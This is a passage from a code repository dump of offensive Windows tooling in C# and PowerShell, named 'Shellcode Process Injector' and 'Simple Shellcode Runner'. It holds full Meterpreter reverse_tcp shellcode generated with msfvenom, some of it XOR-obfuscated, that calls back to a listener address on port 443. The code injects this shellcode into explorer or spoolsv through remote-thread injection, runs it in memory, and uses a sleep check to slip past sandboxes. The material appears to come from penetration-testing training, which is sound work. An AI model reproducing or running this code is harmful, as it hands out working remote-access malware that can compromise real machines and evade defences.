windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp 65 | byte[] buf = new byte[511] { 66 | 0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8, 67 | 0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2, 68 | 0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0, 69 | 0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb, 70 | 0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2, 71 | 0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71, 72 | 0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2, 73 | 0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2, 74 | 0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33, 75 | 0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf, 76 | 0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71, 77 | 0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2, 78 | 0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2, 79 | 0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13, 80 | 0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa, 81 | 0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f, 82 | 0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e, 83 | 0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92, 84 | 0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0, 85 | 0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 86 | 0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f, 87 | 0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40, 88 | 0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f, 89 | 0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33, 90 | 0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f, 91 | 0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb, 92 | 0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb, 93 | 0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb, 94 | 0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 95 | 0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba, 96 | 0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f, 97 | 0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6, 98 | 0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb, 99 | 0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05, 100 | 0x2f 101 | }; 102 | 103 | int len = buf.Length; 104 | 105 | // Parse arguments, if given (process to inject) 106 | String procName = ""; 107 | if (args.Length == 1) 108 | { 109 | procName = args[0]; 110 | } 111 | else if (args.Length == 0) { 112 | // Inject based on elevation level 113 | if (IsElevated) 114 | { 115 | Console.WriteLine("Process is elevated."); 116 | procName = "spoolsv"; 117 | } 118 | else 119 | { 120 | Console.WriteLine("Process is not elevated."); 121 | procName = "explorer"; 122 | } 123 | } 124 | else 125 | { 126 | Console.WriteLine("Please give either one argument for a process to inject, e.g. \".\\ShInject.exe explorer\", or leave empty for auto-injection."); 127 | return; 128 | } 129 | 130 | Console.WriteLine($"Attempting to inject into {procName} process..."); 131 | 132 | // Get process IDs 133 | Process[] expProc = Process.GetProcessesByName(procName); 134 | 135 | // If multiple processes exist, try to inject in all of them 136 | for (int i = 0; i < expProc.Length; i++) 137 | { 138 | int pid = expProc[i].Id; 139 | 140 | // Get a handle on the process 141 | IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, pid); 142 | if ((int)hProcess == 0) 143 | { 144 | Console.WriteLine($"Failed to get handle on PID {pid}."); 145 | continue; 146 | } 147 | Console.WriteLine($"Got handle {hProcess} on PID {pid}."); 148 | 149 | // Allocate memory in the remote process 150 | IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite); 151 | Console.WriteLine($"Allocated {len} bytes at address {expAddr} in remote process."); 152 | 153 | // Decode the payload 154 | for (int j = 0; j < buf.Length; j++) 155 | { 156 | buf[j] = (byte)((uint)buf[j] ^ 0xfa); 157 | } 158 | 159 | // Write the payload to the allocated bytes 160 | IntPtr bytesWritten; 161 | bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten); 162 | Console.WriteLine($"Wrote {bytesWritten} payload bytes (result: {procMemResult})."); 163 | 164 | IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero); 165 | Console.WriteLine($"Created remote thread at {threadAddr}. Check your listener!"); 166 | break; 167 | } 168 | } 169 | } 170 | } -------------------------------------------------------------------------------- /Shellcode Process Injector/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Shellcode Process Injector")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Shellcode Process Injector")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("e08baa9c-9d20-4c9a-8933-ec567f39f54c")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Shellcode Process Injector/Shellcode Process Injector.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C} 8 | Exe 9 | Shellcode_Process_Injector 10 | Shellcode Process Injector 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /Shellcode Process Injector/Shellcode Process Injector.ps1: -------------------------------------------------------------------------------- 1 | function LookupFunc { 2 | Param ($moduleName, $functionName) 3 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 4 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1]. 5 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 6 | $tmp=@() 7 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} 8 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, 9 | @($moduleName)), $functionName)) 10 | } 11 | 12 | function getDelegateType { 13 | Param ( 14 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func, 15 | [Parameter(Position = 1)] [Type] $delType = [Void] 16 | ) 17 | $type = [AppDomain]::CurrentDomain. 18 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), 19 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run). 20 | DefineDynamicModule('InMemoryModule', $false). 21 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', 22 | [System.MulticastDelegate]) 23 | $type. 24 | DefineConstructor('RTSpecialName, HideBySig, Public', 25 | [System.Reflection.CallingConventions]::Standard, $func). 26 | SetImplementationFlags('Runtime, Managed') 27 | $type. 28 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func). 29 | SetImplementationFlags('Runtime, Managed') 30 | return $type.CreateType() 31 | } 32 | 33 | $procId = (Get-Process explorer).Id 34 | 35 | # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f ps1 36 | [Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x51,0x48,0x8b,0x52,0x20,0x56,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x8b,0x72,0x50,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x41,0x51,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x44,0x8b,0x40,0x20,0x8b,0x48,0x18,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x48,0x1,0xd0,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5 37 | 38 | # C#: IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, procId); 39 | $hProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess), 40 | (getDelegateType @([UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke(0x001F0FFF, 0, $procId) 41 | 42 | # C#: IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite); 43 | $expAddr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAllocEx), 44 | (getDelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, [UInt32]$buf.Length, 0x3000, 0x40) 45 | 46 | # C#: bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten); 47 | $procMemResult = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WriteProcessMemory), 48 | (getDelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [IntPtr])([Bool]))).Invoke($hProcess, $expAddr, $buf, [Uint32]$buf.Length, [IntPtr]::Zero) 49 | 50 | # C#: IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero); 51 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateRemoteThread), 52 | (getDelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [UInt32], [IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, 0, $expAddr, 0, [IntPtr]::Zero) 53 | 54 | Write-Host "Injected! Check your listener!" -------------------------------------------------------------------------------- /Shellcode Process Injector/Shellcode Process Injector.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Shellcode Process Injector", "Shellcode Process Injector.csproj", "{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|x64.ActiveCfg = Debug|x64 19 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|x64.Build.0 = Debug|x64 20 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|Any CPU.ActiveCfg = Release|x64 21 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|Any CPU.Build.0 = Release|x64 22 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|x64.ActiveCfg = Release|x64 23 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {04F2AB2E-4DA3-43DF-86FE-736580CBA9D4} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Simple Shellcode Runner/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Simple Shellcode Runner/Program.cs: -------------------------------------------------------------------------------- 1 | using System.Runtime.InteropServices; 2 | using System; 3 | 4 | namespace rev 5 | { 6 | public class Program 7 | { 8 | public const uint EXECUTEREADWRITE = 0x40; 9 | public const uint COMMIT_RESERVE = 0x3000; 10 | 11 | [DllImport("kernel32.dll")] 12 | static extern void Sleep(uint dwMilliseconds); 13 | 14 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 15 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect); 16 | 17 | [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 18 | private unsafe static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, uint lpThreadId); 19 | 20 | [DllImport("kernel32.dll", SetLastError = true)] 21 | public static extern Int32 WaitForSingleObject(IntPtr Handle, Int32 Wait); 22 | 23 | public static void Main() 24 | { 25 | 26 | DateTime t1 = DateTime.Now; 27 | Sleep(10000); 28 | double deltaT = DateTime.Now.Subtract(t1).TotalSeconds; 29 | if (deltaT < 9.5) 30 | { 31 | return; 32 | } 33 | 34 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp 35 | // XORed with key 0xfa 36 | byte[] buf = new byte[511] { 37 | 0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8, 38 | 0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2, 39 | 0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0, 40 | 0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb, 41 | 0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2, 42 | 0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71, 43 | 0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2, 44 | 0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2, 45 | 0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33, 46 | 0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf, 47 | 0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71, 48 | 0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2, 49 | 0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2, 50 | 0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13, 51 | 0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa, 52 | 0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f, 53 | 0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e, 54 | 0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92, 55 | 0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0, 56 | 0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 57 | 0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f, 58 | 0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40, 59 | 0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f, 60 | 0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33, 61 | 0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f, 62 | 0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb, 63 | 0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb, 64 | 0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb, 65 | 0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 66 | 0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba, 67 | 0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f, 68 | 0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6, 69 | 0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb, 70 | 0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05, 71 | 0x2f 72 | }; 73 | int payloadSize = buf.Length; 74 | IntPtr payAddr = VirtualAlloc(IntPtr.Zero, payloadSize, COMMIT_RESERVE, EXECUTEREADWRITE); 75 | for (int i = 0; i < buf.Length; i++) 76 | { 77 | buf[i] = (byte)((uint)buf[i] ^ 0xfa); 78 | } 79 | Marshal.Copy(buf, 0, payAddr, payloadSize); 80 | IntPtr payThreadId = CreateThread(IntPtr.Zero, 0, payAddr, IntPtr.Zero, 0, 0); 81 | int waitResult = WaitForSingleObject(payThreadId, -1); 82 | } 83 | } 84 | } -------------------------------------------------------------------------------- /Simple Shellcode Runner/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Simple Shellcode Runner")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Simple Shellcode Runner")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | 